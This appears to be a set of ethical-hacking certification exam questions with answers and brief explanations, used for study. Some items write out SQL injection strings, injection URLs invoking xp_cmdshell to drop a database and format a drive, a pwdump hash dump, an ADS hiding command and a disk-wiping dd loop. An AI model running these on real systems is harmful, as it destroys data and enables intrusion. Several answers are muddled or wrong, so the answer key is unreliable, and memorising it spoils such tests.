C. Connect scanA TCP Connect scan, named after the UNIX connect ( ) system call is the most accurate scanning method. If a port is open, the OS completes the TCP three-way handshake, and the port scanner immediately closes the connection.
Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed tojohndoe@gmail.com". What do you think has occurred?A. The web application picked up a record at randomB. The web application emailed the administrator about the errorC. The server error has caused the application to malfunctionD. The web application returned the first record it found
D. The web application returned the first record it found. The web application sends a query to a SQL database and by giving it the criteria 1=1, which will always be true, it will return the first value it finds.
What file system vulnerability does the following command take advantage of?type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exeA. Backdoor accessB. ADSC. NTFSD. HFS
B. ADS. ADS (Alternate Data Stream) is a feature in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams, and the data streams are accessed by filename :stream.
Michael is the security administrator for the ABC company? Michael has been charged with strengthening the company's security policies, including its password policies.Due to certain legacy applications, Michael was only able to enforce a password group policy in Active Directory with a minimum of 10 characters.He has informed the company's employees, however, that the new password policy requires that everyone must have complex passwords with at least 14 characters.Michael wants to ensure that everyone is using complex passwords that meet the new security policy requirements. Michael has just logged on to one of the network's domain controllersand is about to run the following command. (see graphic)What will this command accomplish?A. Dumps Active Directory password hashes to pwd.txtB. Internet Cache file is piped to pwd.txtC. Password history file is piped to pwd.txtD. Dumps SAM password hashes to pwd.txt
D. Dumps SAM password hashes to pwd.txt.Pwdump is a hack tool that is used to grab Windows password hashes from a remote Windowscomputer. Pwdump > pwd.txt will redirect the output from pwdump to a text file named pwd.txt
June, a security analyst, understands that a polymorphic virus has the ability to mutate and canchange its known viral signature and hide from signature-based antivirus programs. Can June usean antivirus program in this case and would it be effective against a polymorphic virus?A. Yes. June can use an antivirus program since it compares the signatures of executable files tothe database of known viral signatures and it is very effective against a polymorphic virusB. No. June can't use an antivirus program since it compares the signatures of executable files tothe database of known viral signatures and in the case the polymorphic viruses cannot bedetected by a signature-based anti-virus programC. No. June can't use an antivirus program since it compares the size of executable files to thedatabase of known viral signatures and it is effective on a polymorphic virusD. Yes. June can use an antivirus program since it compares the parity bit of executable files tothe database of known check sum counts and it is effective on a polymorphic virus
B. No. June can't use an antivirus program since it compares the signatures of executable files to a database of known viral signatures, and polymorphic viruses cannot be detected by a signature-based AV system. Although there are functions like heuristic scanning and sandbox technology, the Antivirusprogram is still mainly depending of signature databases and can only find already known viruses.
Which tool/utility can help you extract the application layer data from each TCP connection from alog file into separate files?A. argusB. TcpdumpC. TCPflowD. Snort
C. TCPflowTCPflow is a program that captures data transmitted as part of TCP connections (flows) and stores the data in a way that is convenient for protocol analysis or debugging. A program like 'tcpdump' shows a summary of packets seen on the wire, but doesn't usually store the data that's actually being transmitted. In contrast, tcpflow reconstructs the actual data streams and stores each flow in a separate file for later analysis.
Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic andforward it so that the server might perform undesirable actions. Alternatively, the attacker couldpose as the server or client after a legitimate authentication and gain unauthorized access to data.Which of the following is NOT a means that can be used to minimize or protect against such an attack?A. TimestampsB. File permissionsC. SMB SigningD. Sequence numbers monitoring
A,C,DA. TimestampsC. SMB SigningD. Sequence numbers
Bill has successfully executed a buffer overflow against a Windows IIS web server. He has beenable to spawn an interactive shell and plans to deface the main web page. He first attempts to usethe "Echo" command to simply overwrite index.html and remains unsuccessful. He then attemptsto delete the page and achieves no progress. Finally, he tries to overwrite it with another page inwhich also he remains unsuccessful. What is the probable cause of Bill's problem?A. You cannot use a buffer overflow to deface a web pageB. The system is a honeypotC. The HTML file has permissions of read onlyD. There is a problem with the shell and he needs to run the attack again
C. The HTML file has permissios of read-only.
More sophisticated IDSs look for common shellcode signatures. But even these systems can bebypassed, by using polymorphic shellcode. This is a technique common among virus writers itbasically hides the true nature of the shellcode in different disguises.How does a polymorphic shellcode work?A. They compress shellcode into normal instructions, uncompress the shellcode using loader code and then executing the shellcodeB. They reverse the working instructions into opposite order by masking the IDS signaturesC. They convert the shellcode into Unicode, using loader to convert back to machine code then executing themD. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode
D. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode
Blake is in charge of securing all 20 of his company's servers. He has enabled hardware andsoftware firewalls, hardened the operating systems, and disabled all unnecessary services on allthe servers. Unfortunately, there is proprietary AS400 emulation software that must run on one ofthe servers that requires the telnet service to function properly. Blake is especially concernedabout this since telnet can be a very large security risk in an organization. Blake is concernedabout how this particular server might look to an outside attacker so he decides to perform somefootprinting, scanning, and penetration tests on the server.Blake telnets into the server and typesin the following command:HEAD / HTTP/1.0After pressing enter twice, Blake gets the following results: (see graphic)What has Blake just accomplished?
B. Grabbed the banner
You are sniffing an unprotected WiFI network located in a JonDonalds Cybercafe with Ethereal tocapture hotmail e-mail traffic. You see lots of people using their laptops browsing the web whilesipping brewed coffee from JonDonalds. You want to sniff their e-mail messages traversing the unprotected WiFi network. Which of the following ethereal filters will you configure to display only the packets with hotmail emailmessages?A. (http contains "e-mail") && (http contains "hotmail")B. (http = "login.passport.com") && (http contains "SMTP")C. (http contains "hotmail") && (http contains "Reply-To")D. (http = "login.passport.com") && (http contains "POP3")
C. (http contains "hotmail") && (http contains "Reply-To")Each Hotmail message contians the tag Reply-To: and "xxxx-xxx-xxx.xxxx.hotmail.com" in the received tag.
Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay thecookie even while the session is valid on the server. Why do you think this is possible?A. It works because encryption is performed at the application layer (single encryption key)B. It works because encryption is performed at the network layer (layer 1 encryption)C. Any cookie can be replayed irrespective of the session statusD. The scenario is invalid as a secure cookie cannot be replayed
A. It works because encryption is performed at the application layer (single encryption key)Single key encryption (conventional cryptography) uses a single word or phrase as the key. The same key is used by the sender to encrypt and the receiver to decrypt. Sender and receiver initially need to have a secure way of pasing the key from one to the other. With TLS or SSL this would not be possible.
John has a proxy server on his network which caches and filters web access. He shuts down allunnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will notallow users to connect to any outbound ports. Jack, a network user has successfully connected toa remote server on port 80 using netcat. He could in turn drop a shell from the remote machine.Assuming an attacker wants to penetrate John's network, which of the following options is he likelyto choose?A. Use HTTPTunnel or Stunnel on port 80 and 443B. Use reverse shell using FTP protocolC. Use Monkey shellD. Use ClosedVPN
A. Use HTTPTunnel or Stunnel on port 80 and 443.As long as you allow http or https traffic attacks can be tunneled over those protocols with Stunnel or HTTPTunnel.
One of the most common and the best way of cracking RSA encryption is to begin to derive thetwo prime numbers, which are used in the RSA PKI mathematical process. If the two numbers pand q are discovered through a _____________ process, then the private key can be derived.A. HashingB. FactorizationC. Prime detectionD. Brute-forcing
B. Factorization
Microsoft Authenticode technology is used for:A. Digitally signing Javascript filesB. Digitally signing Java AppletsC. Digitally signing SSL certificatesD. Digitally signing ActiveX controls
D. Digitally signing ActiveX controls. Authenticode identifies the publisher of signed software and verifies that it hasn't been tamperedwith, before users download software to their PCs. As a result, end users can make a moreinformed decision as to whether or not to download code. Authenticode relies on digital certificatesand is based on specifications that have been used successfully in the industry for some time,including Public Key Cryptography Standards (PKCS) #7 (encrypted key specification), PKCS #10(certificate request formats), X.509 (certificate specification), and Secure Hash Algorithm (SHA)and MD5 hash algorithms.
What port number is used by LDAP protocol?A. 464B. 389C. 110D. 445
B. 389AD and Exchange use LDAP via TCP port 389 for clients.
You are conducting pen-test against a company's website using SQL Injection techniques. You enter "anything' or 1=1 " in the username field of an authentication form. This is the output returned from the server.What is the next step to be done?A. Identify the user context of the web application by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'B. Reboot the web server by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'; --C. Delete the database and format the C: drive by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND drop database myDB;xp_cmdshell 'format c: /q /yes '; --D. Identify the database and table name by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 ANDascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109
A. Identify the user context of the web application by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'
Melissa is a virus that targeted Microsoft Windows platforms. To which category does this virusbelong?A. PolymorphicB. SystemC. Boot Sector infectorD. Macro
D. MacroThe Melissa macrovirus propagates in the form of an e-mail message containing an infected Word document as an attachment.
Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. Hewonders if his firewall has been breached. What would be your inference?A. The attacker is using the ICMP protocol to have a covert channelB. Eric has a Wingate package providing FTP redirection on his networkC. Somebody is using SOCKS on the network to communicate through the firewallD. Eric's network has been penetrated by a firewall breach
C. Somebody is using SOCKS on the network to communicate through the firewall
Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign,display, or modify ACLs (access control lists) to files or folders and that could also be used within batch files. Which of the following tools could be used for this purpose?A. NTPERM.exeB. PERM.exeC. CACLS.exeD. CLACS.exe
C. CACLS.exeCacls.exe (Change Access Control Lists) is an executable in Microsoft Windows to change AccessControl List (ACL) permissions on a directory, its subcontents, or files. An access control list is a list of permissions for a file or directory that controls who can access it.
What hacking attack is challenge/response authentication used to prevent?A. Scanning attacksB. Password cracking attacksC. Replay attacksD. Session hijacking attacks
C. Replay attacksA replay attack is a form of network attack in which a valid data transmission is maliciously orfraudulently repeated or delayed. This is carried out either by the originator or by an adversarywho intercepts the data and retransmits it. With a challenge/response authentication you ensurethat captured packets can't be retransmitted without a new authentication.
StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GSoption use _____ defense against buffer overflow attacks.A. Format checkingB. Hex editingC. Non-executing stackD. Canary
D. CanaryCanaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making the overflow evident. (Think of a canary in a coalmine)
Kevin has been asked to write a short program to gather user input for a web application. He likesto keep his code neat and simple. His chooses to use printf(str) where he should have ideally usedprintf("%s", str). What attack will his program expose the web application to?A. Format String AttackB. Unicode Traversal AttackC. SQL injection AttackD. Cross Site Scripting
A. Format String AttackFormat string attacks are a new class of software vulnerability discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful coe. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that peform formatting, such as printf( ). A malicious user may use the %s and %x format tokens, among others, to print data form teh stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf( ) and similar functions to write back the number of bytes formatted to the same argument to printf( ), assuming that the corresponding argument exists, and is of type int* .
You have successfully run a buffer overflow attack against a default IIS installation running on aWindows 2000 server. The server allows you to spawn a shell. In order to perform the actions youintend to do, you need elevated permissions. You need to know what your privileges are within theshell. What are your current privileges?A. AdministratorB. IIS default installation accountC. IUSR_COMPUTERNAMED. Local_System
D. LOCAL_SYSTEMIf you manage to get hte system to start a shell fo ryou, that shell will be running as LOCAL_SYSTEM
What are the differences between SSL and S-HTTP?A. SSL operates at the transport layer and S-HTTP operates at the application layerB. SSL operates at the application layer and S-HTTP operates at the network layerC. SSL operates at the application layer and S-HTTP operates at the transport layerD. SSL operates at the network layer and S-HTTP operates at the application layer
A. SSL operates at the transport layer, and S-HTTP operates at the application layer. The main difference between the protocols is the layer at which they operate. SSL operates at the transport layer, and mimics the "socket library" while S-HTTP operates at the application layer. Encryption of the trnasport layer allows SSL to be application-independent, while S-HTTP is llimited to the specific software implementing it. The protocols adopt different philosophies toward encryption as well, with SSL encrypting the entire communications channel and S-HTTP encrypting each message independently.
Dave has been assigned to test the network security of Acme Corp. The test was announced tothe employees. He created a webpage to discuss the progress of the tests with employees whowere interested in following the test. Visitors were allowed to click on a sand clock to mark theprogress of the test. Dave successfully embeds a keylogger. He also added some statistics on thewebpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond?A. The attack was deception and security was not directly compromisedB. Security was not compromised as the webpage was hosted internallyC. The attack was social engineering and the firewall did not detect itD. The attack did not fall through as the firewall blocked the traffic
C. This was just another way to trick the information out of the users without the need to hack into any systems. All traffic is outgoing and initiated by the user so the firewall will not react.
_____ ensures that the enforcement of organizational security policy does not rely on voluntaryweb application user compliance. It secures information by assigning sensitivity labels oninformation and comparing this to the level of security a user is operating at.A. Discretionary Access ControlB. Role-based Access ControlC. Mandatory Access ControlD. Authorized Access Control
C. Mandatory Access ControlIn computer security, mandatory access control (MAC) is a kind of access control, defined by theTCSEC as "a means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity."
Study the snort rule given:alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivatorbind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|";distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 0000 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin;sid:2192; rev:1;)alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPCISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase;offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c00|"; nocase; distance:5; within:12; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1;within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|";distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193;rev:1;)From the options below, choose the exploit against which this rule applies?A. IIS UnicodeB. SQL SlammerC. MS BlasterD. WebDav
C. MS BlasterMS Blaster scans the Internet for computers that are vulnerable to its attack. Once found, it tries toenter the system through the port 135 to create a buffer overflow. TCP ports 139 and 445 may also provide attack vectors.
You have chosen a 22 character word from the dictionary as your password. How long will it taketo crack the password by an attacker? A. 5 minutesB. 16 million yearsC. 200 yearsD. 23 days
A. Five minutes. When this question was written-MAYBE five minutes. Now? Choose less time if it's an option on the exam. What kind of dumbshit uses a dictionary word?
Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all therecommendations for securing the operating system and IIS. These servers are going to runnumerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob isstill concerned about the security of these servers because of the potential for financial loss. Bobhas asked his company's firewall administrator to set the firewall to inspect all incoming traffic onports 80 and 443 to ensure that no malicious data is getting into the network.Why will this not be possible?A. Firewalls cannot inspect traffic at all, they can only block or allow certain portsB. Firewalls cannot inspect traffic coming through port 80C. Firewalls cannot inspect traffic coming through port 443D. Firewalls can only inspect outbound traffic
A. Firewalls cannot inspect traffic at all, they can only block or allow certain ports. In order to really inspect traffic and traffic patterns you need an IDS.
Which of the following is a patch management utility that scans one or more computers on your network and alerts you if any important Microsoft security patches are missing. It then provides links that enable those missing patches to be downloaded and installed.A. MBSAB. ASNBC. PMUSD. BSSA
A. MBSAThe Microsoft Baseline Security Analyzer is a tool put out by Microsoft to help analyze security problems in Microsoft Windows. It does this by scanning the system for security problems in Windows, Windows components, such as the IIS we server application, Microsoft SQL server, and Microsoft Office. One example of an issue might be that permissions for one of hte directories in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files by outsiders.
The network administrator at Spears Technology, Inc has configured the default gateway Ciscorouter's access-list as below:Current configuration : 1206 bytes!version 12.3!hostname Victim!enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0!interface Ethernet0/0p address dhcpp nat outsidealf-duplex!interface Ethernet0/1p address 192.168.1.1 255.255.255.0p nat insidealf-duplex!router ripetwork 192.168.1.0!ip nat inside source list 102 interface Ethernet0/0 overloadno ip http serverip classless!access-list 1 permit 192.168.1.0 0.0.0.255access-list 102 permit ip any any!snmp-server community public ROsnmp-server community private RW 1snmp-server enable traps tty!line con 0ogging synchronousoginline aux 0line vty 0 4assword secretogin!!endYou are hired to conduct security testing on their network. You successfully brute-force the SNMPcommunity string using a SNMP crack tool. The access-list configured at the router prevents youfrom establishing a successful connection.You want to retrieve the Cisco configuration from the router. How would you proceed?A. Run a network sniffer and capture the returned traffic with the configuration file from the routerB. Use the Cisco's TFTP default password to connect and download the configuration fileC. Send a customized SNMP set request with a spoofed source IP address in the range -192.168.1.0D. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the routermasking your IP address
A. Run a network sniffer and capture the returned traffic with the configuration file from the router.C. Send a customized SNMP set request with a spoofed source IP address in the range 192.168.1.0/24 SNMP is allowed only by access-list 1. Therefore, you need to spoof a 192.168.1.0/24 address and then sniff the reply from the gateway.
Why do you need to capture five to ten million packets in order to crack WEP with AirSnort?A. All IVs are vulnerable to attackB. Air Snort uses a cache of packetsC. Air Snort implements the FMS attack and only encrypted packets are countedD. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers
C. Air Snort implements the FMS attack and only encrypted packets are counted. AirSnort and similar tools that implement the FMS attack require very large numbers of packets to be gathered before being able to crack a WEP key. AirSnort's site estimates the total number of packets at 5-10 millions, but this may be a conservative estimate.
Bob is conducting a password assessment for one of his clients. Bob suspects that passwordpolicies are not in place and weak passwords are probably the norm throughout the company he isevaluating. Bob is familiar with password weaknesses and key loggers. What are the means thatBob can use to get password from his client hosts and servers?A. Passwords are always best obtained using Hardware key loggersB. Hardware and Software KeyloggersC. Software only, they are the most effectiveD. Hardware, Software, and Sniffing
D. Hardware, software and sniffing. All loggers will work as long as he has physical access to the computers.
You just purchased the latest DELL computer, which comes pre-installed with Windows XP,McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things thatyou must do before you use it.A. Install the latest signatures for Antivirus softwareB. Configure "Windows Update" to automaticC. Create a non-admin user with a complex password and logon to this accountD. Enable "guest" accountE. Install a personal firewall and lock down unused ports from connecting to your computerF. New installation of Windows should be patched by installing the latest service packs andhotfixesG. You can start using your computer since the vendor such as DELL, HP and IBM already wouldhave installed the latest service packs up-to-date
A. Install the latest signatures for AV softwareB.Configure "Windows Update" to automaticC. Create a non-admin user with a complex password and logon to this accountE. Install a personal firewall and lock down unused ports from connecting to your computer.F. New installation of Windows should be patched by installing the latest service packs and hotfixes.
Study the log below and identify the scan type.tcpdump -vv host 192.168.1.1017:34:45.802163 eth0 < 192.168.1.1 > victim: ip-proto-117 0 (ttl 48, id 36166)17:34:45.802216 eth0 < 192.168.1.1 > victim: ip-proto-25 0 (ttl 48, id 33796)17:34:45.802266 eth0 < 192.168.1.1 > victim: ip-proto-162 0 (ttl 48, id 47066)17:34:46.111982 eth0 < 192.168.1.1 > victim: ip-proto-74 0 (ttl 48, id 35585)17:34:46.112039 eth0 < 192.168.1.1 > victim: ip-proto-117 0 (ttl 48, id 32834)17:34:46.112092 eth0 < 192.168.1.1 > victim: ip-proto-25 0 (ttl 48, id 26292)17:34:46.112143 eth0 < 192.168.1.1 > victim: ip-proto-162 0 (ttl 48, id 51058)tcpdump -vv -x host 192.168.1.1017:35:06.731739 eth0 < 192.168.1.10 > victim: ip-proto-130 0 (ttl 59, id 42060) 4500 0014 a44c0000 3b82 57b8 c0a8 010a c0a8 0109 0000 0000 0000 0000 0000 0000 0000 0000 0000 00000000 0000 0000A. nmap S 192.168.1.10B. nmap -sO -T 192.168.1.10C. nmap R 192.168.1.10D. nmap V 192.168.1.10
B. nmap -sO -T 192.168.1.10
What does the term 'Hacktivism' means?A. Someone who is hacking for a causeB. Someone who has at least 12 years of hacking experienceC. Someone who subscribe to hacker's magazineD. Someone that has an urge to constantly hack
A. Hacking for a cause.
What port number is used by Kerberos protocol?A. 419B. 44C. 88D. 487
C. 88Kerbos traffic uses UDP/TCP protocol source and destination port 88
Mark works as a contractor for the Department of Defense and is in charge of network security. Hehas spent the last month securing access to his network from all possible entry points. He hassegmented his network into several subnets and has installed firewalls all over the network. Hehas placed very stringent rules on all the firewalls, blocking everything in and out except ports thatmust be used. He does need to have port 80 open since his company hosts a website that mustbe accessed from the Internet. Mark is fairly confident of his perimeter defenses, but is still worried about programs like Hping2 that can get into a network through covert channels.How should mark protect his network from an attacker using Hping2 to scan his internal network?A. Block ICMP type 13 messagesB. Block all outgoing traffic on port 53C. Use stateful inspection on the firewallsD. Block all incoming traffic on port 53
A. Block ICMP type 13 messages. An ICMP type 13 message is an ICMP timestamp request and waits for an ICMP timestamp reply. The remote node is right to do, still it would not be necessary as it is optional and thus many ip stacks ignore such packets. Nevertheless, nmap again archived to make its packets unique by setting the originating timestamp field in the packet to 0.
Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that wouldresult in serious financial losses. He planned the attack carefully and carried out the attack at theappropriate moment. Meanwhile, Trent, an administrator at Brownies Inc., realized that their mainfinancial transaction server had been attacked. As a result of the attack, the server crashed andTrent needed to reboot the system, as no one was able to access the resources of the company.This process involves human interaction to fix it. What kind of Denial of Service attack was bestillustrated in the scenario above?A. DOS attacks which involves crashing a network or systemB. DOS attacks which involves flooding a network or systemC. Simple DDOS attackD. DOS attacks which is done accidentally or deliberately
A. DOS attacks which involve crashing a network or system.
Data is sent over the network as clear text (unencrypted) when Basic Authentication is configuredon Web Servers.A. TrueB. False
A. True. Using HTTP basic authentication will result in your PW being sent over the internet as clear-text. Don't use this technique unless you understand what the ramifications of this are.
Bob is very security conscious; he is about to test a site that is known to have malicious applets,code, and more. Bob always makes use of a basic Web Browser to perform such testing. Which ofthe following web browsers can adequately fill this purpose?A. LynxB. MozillaC. Internet ExplorerD. Tiger
A. LynxLynx is a program used to browse the web, which works on simple text terminals rather than requiring a graphical computer display terminal.
Jackson discovers that the wireless AP transmits 128 bytes of plaintext, and the station respondsby encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipherthat are used by WEP to encrypt subsequent network traffic. What authentication mechanism isbeing followed here?A. no authenticationB. open system authenticationC. single key authenticationD. shared key authentication
D. Shared key authentication.
Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMPEcho Request) is sent as a directed broadcast to a subnet on the Internet. All the machines onthat subnet respond to this broadcast. By spoofing the source IP address of the packet, all theresponses will get sent to the spoofed IP address. Thus, a hacker can often flood a victim withhundreds of responses for every request the hacker sends out.Who are the primary victims of these attacks on the Internet today?A. SPAM filters are the primary victim to smurf attacksB. Mail servers are the primary victim to smurf attacksC. IDS devices are the primary victim to smurf attacksD. IRC servers are the primary victim to smurf attacks
D. IRC servers are the primary victims of smurf attacks. IRC servers are the primary victims of smurf attacks. Script-kiddies run programs that scan the Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these amplifiers and share them. Thus, when a victim is flooded with responses they will appear to come from all over the Internet. On IRCs hackers will use bots that connect to IRC servers and collect IP addresses. The bots then send the forged packets to the amplifiers to inundate the victim.
Bret is a web application administrator and has just read that there are a number of surprisinglycommon web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet.He has also read that when an organization deploys a web application, they invite the world tosend HTTP requests. Attacks buried in these requests sail past firewalls, filters, platformhardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret isdetermined to weed out any vulnerabilities. What are some common vulnerabilities in webapplications that he should be concerned about?A. No IDS configured, anonymous user account set as default, missing latest security patch, nofirewall filters set and visible clear text passwords are just a few common vulnerabilitiesB. No SSL configured, anonymous user account set as default, missing latest security patch, nofirewall filters set and an inattentive system administrator are just a few common vulnerabilitiesC. Visible clear text passwords, anonymous user account set as default, missing latest securitypatch, no firewall filters set and no SSL configured are just a few common vulnerabilitiesD. Non-validated parameters, broken access control, broken account and session management,cross-side scripting and buffer overflows are just a few common vulnerabilities
D. Non-validated parameters, broken access control, broken account and session management, cross-side scripting and buffer overflows are just a few common vulnerabilities.
Which of the following best describes Vulnerability?A. The loss potential of a threatB. An action or event that might prejudice securityC. A weakness or error that can lead to a compromiseD. An agent that could take advantage of a weakness
C. A weakness or error that can lead to a compromise. A vulnerability is a flaw or weakness in system security procedures, design or implementation that could be exercise (accidentally triggered or intentionally exploited) and result in harm to an IT system or activity.
Scanning for services is an easy job for Bob as there are so many tools available from theInternet. In order for him to check the vulnerability of Brownies Inc., he went through a fewscanners that are currently available.Here are the scanners that he used:1. Axent's NetRecon (http://www.axent.com)2. SARA, by Advanced Research Organization (http://www-arc.com/sara/)3. VLAD the Scanner, by Razor (http://razor.bindview.com/tools/)However, are there any other alternative ways to make sure that the services that have beenscanned will be more accurately reported and detailed for Bob? What would be the best method toaccurately identify the services running on a victim host?A. Using a vulnerability scanner to try to probe each port to verify or figure out which service isrunning for Brownies Inc.B. Using Cheops-ng to identify the devices of Brownies Inc.C. Using the default port and OS to make a best guess of what services are running on each portfor Brownies IncD. Using the manual method of telnet to each of the open ports of Brownies Inc.
D. Using the manual method of telnet to each of the open ports of Brownies, Inc. By running a telnet connection to the open ports you will receive banners that tell you what service is answering on that specific port.
In an attempt to secure his 802.11b wireless network, Bob decides to use strategic antennapositioning. He places the antennas for the access points near the center of the building. For thoseaccess points near the outer edge of the building he uses semi-directional antennas that facetowards the buildings center. There is a large parking lot and outlying field surrounding the buildingthat extends out half a mile around the building. Bob figures that with this and his placement ofantennas, his wireless network will be safe from attack. Which of the following statements is true?A. Bob's network will be safe but only if he doesn't switch to 802.11aB. With the 300-foot limit of a wireless signal, Bob's network is safeC. Wireless signals can be detected from miles away; Bob's network is not safeD. Bob's network will not be safe until he also enables WEP
C. Wireless signals can be detected from miles away. Bob's network is not safe. It all depends on the capacity of the antenna that a potential hacker will use in order to gain access to the wireless net.
ARP poisoning is achieved in _____ stepsA. 1B. 3C. 2D. 4
C. 2The hacker begins by sending a malicious ARP reply (for which there was no previous request) to your router, associating his computer's MAC address with your IP address. Now, your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC address with the router's IP address. Now, your machine thinks the hacker's computer is your router. The hacker has now used ARP poisoning to accomplish a MITM attack.
While doing web application testing, you might be required to look through multiple web pagesonline which can take a long time. Which process below would be a more efficient way of doingthis type of validation?A. Useget utility to download all pages locally for further inspectionB. Use wget utility to download all pages locally for further inspectionC. Use mget utility to download all pages locally for further inspectionD. Use get * utility to download all pages locally for further inspection
B. Use wget utility to download all pages locally for further inspection. Wget is a utility used for mirroring websites, get* doesn't work, as for the actual FTP command to work there needs to be a space between get and *. get( ); is just bogus, that's a C function that's written 100% wrong. mget dis a command used from "within" ftp itself, ruling out A. Which leaves B use wget which is designed for mirroring and download files, especially webpages if used with the -R option (i.e. wget -R) it could mirror a site, all except the protected portions, of course. GNU Wget is a free network utility to retrieve files from teh Web using FTP and HTTP, and can be used to make mirrors of archives and home pages, thus enabling work in the background after logging off.
John Beetlesman, the hacker has successfully compromised the Linux system of AngentTelecommunications, Inc's?Webserver running Apache. He has downloaded sensitive documentsand database files off the machine.Upon performing various tasks, Beetlesman finally runs the following command on the Linux boxbefore disconnecting.for (( i = 0;i<11;i++ )); do?dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hdadoneWhat exactly is John trying to do?A. He is making a bit stream copy of the entire hard disk for later downloadB. He is deleting log files to remove his traceC. He is infecting the hard disk with random virus stringsD. He is wiping the contents of the hard disk with zeros
D. He is wiping the contents of the hard drive with zeros.dd copies an input file to an output file with optional conversions. -if is input fil, -of is output file. /dev/zero is a special file that provides as many null characters (ASCII NULL, ox00; not ASCII character "digit zero," "0", 0x30) as are read from it. /dev/hda is the hard drive.
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporarydata storage area) than it was intended to hold. What is the most common cause of bufferoverflow in software today?A. Bad permissions on filesB. Usage of non-standard programming languagesC. High bandwidth and large number of usersD. Bad quality assurance on software produced
D. Bad quality assurance on a software product. Technically a buffer overflow is a problem with the program's internal implementation.
Spears Technology, Inc is a software development company located in Los Angeles, California.They reported a breach in security, stating that its "security defenses has been breached andexploited for 2 weeks by hackers." The hackers had accessed and downloaded 90,000 addressescontaining customer credit cards and passwords. Spears Technology found this attack to be sosevere that they reported the attack to the FBI for a full investigation. Spears Technology waslooking to law enforcement officials to protect their intellectual property.How did this attack occur? The intruder entered through an employee's home machine, which wasconnected to Spears Technology's corporate VPN network. The application called BEAST Trojanwas used in the attack to open a "back door" allowing the hackers undetected access. Thesecurity breach was discovered when customers complained about the usage of their credit cardswithout their knowledge.The hackers were traced back to Beijing, China through e-mail address evidence. The credit cardinformation was sent to that same e-mail address. The passwords allowed the hackers to accessSpears Technology's network from a remote location, posing as employees. The intent of theattack was to steal the source code for their VOIP system and "hold it hostage" from SpearsTechnology, in exchange for ransom.The hackers had intended on selling the stolen VOIP software source code to competitors.How would you prevent such attacks from occurring in the future at Spears Technology?A. Disable VPN access to all your employees from home machinesB. Replace the VPN access with dial-up modem access to the company's networkC. Allow VPNaccess but replace the standard authentication with biometric authenticationD. Enable 25 character complex passwordpolicy for employees to access the VPN network
A. Disable VPN access to all your employees from home machines. As long as there is a way in for employees through all security measures, you can't be secure, because you never know what computer the employees use to access resources at their workplace.
Buffer overflows are one of the top flaws for exploitation on the Internet today. A buffer overflowoccurs when a particular operation/function writes more data into a variable than the variable wasdesigned to hold. The two popular types of buffer overflows prevalent today are:A. Dynamic buffer overflowB. Active buffer overflowC. Heap based buffer overflowD. Stack based buffer overflow
C. Heap based buffer overflowD. Stack based buffer overflow.
Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The totalsize of this ICMP packet once reconstructed is over 65,536 bytes. From the information given,what type of attack is Bryce attempting to perform?A. SmurfB. Ping of DeathC. FraggleD. SYN Flood
B. Ping of Death
